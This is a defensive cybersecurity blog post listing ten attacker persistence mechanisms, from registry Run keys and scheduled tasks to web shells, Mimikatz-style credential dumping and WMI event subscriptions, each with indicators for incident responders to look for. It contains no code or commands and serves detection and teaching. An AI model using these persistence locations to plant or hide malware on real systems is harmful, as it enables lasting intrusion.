Introduction
In the ever-evolving landscape of cybersecurity, understanding the persistence mechanisms used by hackers is crucial for effective incident response. This blog post aims to educate cybersecurity professionals about various persistence techniques employed by attackers and guide them on what specific artifacts and signs to look for during an incident investigation.
1. Registry Modifications
Context: The Windows Registry is a database storing low-level settings for the operating system and applications. Attackers often manipulate these settings to execute malicious software at system startup.
What to Look For:
- Unusual entries in
HKCU\Software\Microsoft\Windows\CurrentVersion\Run,HKLM\Software\Microsoft\Windows\CurrentVersion\Run, and other startup keys. - Oddly named or misplaced registry keys and values.
- Registry keys referencing executables in unusual file paths.
2. Scheduled Tasks/Cron Jobs
Context: These are used to schedule scripts or programs to run at specific times. Malicious tasks can be hidden among legitimate ones, triggering malware execution at regular intervals.
What to Look For:
- Tasks with names unrelated to their actions or those mimicking system tasks.
- Scripts or executables with obfuscated or encoded content.
- Cron jobs in Unix/Linux systems located in
/etc/cron*directories or usingcrontab.
3. Startup Folder
Context: This folder is intended for programs that run on user login. Malicious files placed here can be easily overlooked.
What to Look For:
- Unfamiliar executables or scripts in
C:\Users\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup. - Shortcuts (.lnk files) that point to unknown applications or scripts.
4. Service Creation
Context: Windows services run in the background, and creating or hijacking a service can grant malware persistence and privilege.
What to Look For:
- Newly created services, especially those with unusual names or descriptions.
- Modified binary paths in existing services.
- Services running from a user directory or temporary folders.
5. DLL Injection and Hijacking
Context: Malware may inject itself into legitimate processes or replace legitimate DLLs to evade detection.
What to Look For:
- Processes executing from abnormal locations (e.g., a system process running from a user directory).
- Unexpected changes in file sizes or timestamps of system DLLs.
- Anomalies in process behavior, like a text editor process making network requests.
6. Rootkits
Context: Rootkits are designed to hide the existence of malware, making them particularly insidious.
What to Look For:
- Discrepancies between system reports from different tools (e.g., a process visible in Task Manager but not in a command-line process list).
- Signs of tampering in system logs or missing logs.
- Unexplained system behavior or performance issues.
7. Web Shells
Context: After compromising a web server, attackers can maintain access through web shells, which are scripts allowing remote control.
What to Look For:
- Unusual files in web directories, especially with extensions like .php, .asp, .jsp.
- Modifications in web server configuration files.
- Abnormal entries in web server access logs, such as frequent POST requests to the same file.
8. Credential Theft
Context: Stealing credentials allows attackers to masquerade as legitimate users, maintaining access without raising suspicion.
What to Look For:
- Unusual login attempts or failed authentication logs.
- Evidence of tools like Mimikatz that are used for credential dumping.
- Anomalies in user behavior, such as accessing data not relevant to their role.
9. Backdoors and RATs
Context: These tools provide remote control over a system, often with extensive capabilities.
What to Look For:
- Unfamiliar or unexpected outbound network connections.
- Processes or services that are unknown or have no legitimate purpose.
- Listening ports that do not correspond to known applications or services.
10. WMI Event Subscriptions
Context: WMI can be used for legitimate system management but also for executing payloads in response to specific events.
What to Look For:
- Unknown or suspicious WMI event subscriptions.
- Scripts or binaries referenced in WMI filters or consumers that are unusual or located in odd directories.
- Logs indicating the creation of new WMI consumers or filters.
Conclusion
Understanding these persistence mechanisms is just the first step. As cybersecurity professionals, we must continuously update our knowledge and tools to detect and respond to these evolving threats. Regular system audits, advanced monitoring tools, and a proactive approach to security are key in staying ahead of attackers.
Remember, in the world of cybersecurity, vigilance is not just a practice; it’s a necessity. Stay informed, stay alert, and stay secure.